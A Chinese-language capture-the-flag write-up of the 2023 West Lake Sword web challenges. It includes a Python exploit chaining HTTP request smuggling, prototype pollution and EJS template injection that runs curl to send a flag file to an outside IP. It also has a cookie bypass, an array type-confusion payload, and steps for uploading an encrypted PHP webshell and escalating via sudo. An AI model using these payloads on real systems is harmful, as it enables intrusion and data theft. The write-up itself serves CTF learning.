西湖论剑 2023 比赛复现
WEB
real_ez_node
在 route/index.js 中:
router.post('/copy',(req,res)=>{res.setHeader('Content-type','text/html;charset=utf-8')var ip = req.connection.remoteAddress;console.log(ip);var obj = {msg: '',}if (!ip.includes('127.0.0.1')) {obj.msg="only for admin"res.send(JSON.stringify(obj));return }let user = {};for (let index in req.body) {if(!index.includes("__proto__")){safeobj.expand(user, index, req.body[index])}}res.render('index');
})
copy 路由会检验 ip 地址是否为 127.0.0.1,且请求体不能有 __proto__。
router.get('/curl', function(req, res) {var q = req.query.q;var resp = "";if (q) {var url = 'http://localhost:3000/?q=' + qtry {http.get(url,(res1)=>{const { statusCode } = res1;const contentType = res1.headers['content-type'];let error;// 任何 2xx 状态码都表示成功响应,但这里只检查 200。if (statusCode !== 200) {
在 curl 路由中我们可以用http 请求走私来访问 copy 从而可以绕过 copy 路由里面的 ip 检测,然后利用constructor.prototype 替代 __proto__,最后打ejs就行了。
payload:
import urllib.parse
import requests
payload = ''' HTTP/1.1POST /copy HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Connection: close
Content-Length: 155{"constructor.prototype.outputFunctionName":"x;global.process.mainModule.require('child_process').exec('curl 192.168.10.104:12345/`cat /flag.txt`');var x"}
'''.replace("\n", "\r\n")def encode(data):tmp = u""for i in data:tmp += chr(0x0100 + ord(i))return tmppayload = encode(payload)
print(payload)r = requests.get('http://192.168.10.104:3000/curl?q=' + urllib.parse.quote(payload))
print(r.text)
Node Magical Login
flag1 可以利用 cookie 令 user=admin 获得。
function Flag1Controller(req,res){try {if(req.cookies.user === SECRET_COOKIE){res.setHeader("This_Is_The_Flag1",flag1.toString().trim())res.setHeader("This_Is_The_Flag2",flag2.toString().trim())res.status(200).type("text/html").send("Login success. Welcome,admin!")}if(req.cookies.user === "admin") {res.setHeader("This_Is_The_Flag1", flag1.toString().trim())res.status(200).type("text/html").send("You Got One Part Of Flag! Try To Get Another Part of Flag!")}else{res.status(401).type("text/html").send("Unauthorized")}}catch (__) {}
}
获得 flag2 的条件有两个,一个是 checkcode 的长度要是 16,另一个就是在转小写后要等于 aGr5AtSp55dRacer,但是这根本不可能,我们可以让它提前异常结束,也就是在 checkcode = checkcode.toLowerCase()处异常报错,那么我们可以令 checkcode 为一个数组,且长度为16。
function CheckController(req,res) {let checkcode = req.body.checkcode?req.body.checkcode:1234;console.log(req.body)if(checkcode.length === 16){try{checkcode = checkcode.toLowerCase()if(checkcode !== "aGr5AtSp55dRacer"){res.status(403).json({"msg":"Invalid Checkcode1:" + checkcode})}}catch (__) {}res.status(200).type("text/html").json({"msg":"You Got Another Part Of Flag: " + flag2.toString().trim()})}else{res.status(403).type("text/html").json({"msg":"Invalid Checkcode2:" + checkcode})}
}
payload:
{"checkcode":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]}
扭转乾坤
随便上传一个提示 content-Type 不行,我们只要令第一个 m 大写就可以了。
unusual php
没环境,就写一下流程吧。
通过 phpinfo 可以看到他使用了 ZendGuard 的加密工具。
可以通过 php.ini 来找到 ZendGuard 扩展的文件名,通过 phpinfo 找到扩展文件也就是 zend_test.so 的位置。(可以在extension_dir 中找到)。
之后通过脚本把扩展保存下来(也可以利用伪协议加密后,再解密,不容易漏字节),放到 ida 中找到 RC4 函数,里面有秘钥(abcsdfadfjiweur)。
使用秘钥加密一句话木马后上传文件,可以用 cyber 网站加密解密。
利用 sudo -l 查看可以执行的命令,利用 sudo chmod 777 /flag ,最后读取 flag。
docker
https://github.com/Randark-JMT/CTF_Archive/tree/main/2022%20xhlj
wp
http://www.hackdig.com/02/hack-904398.htm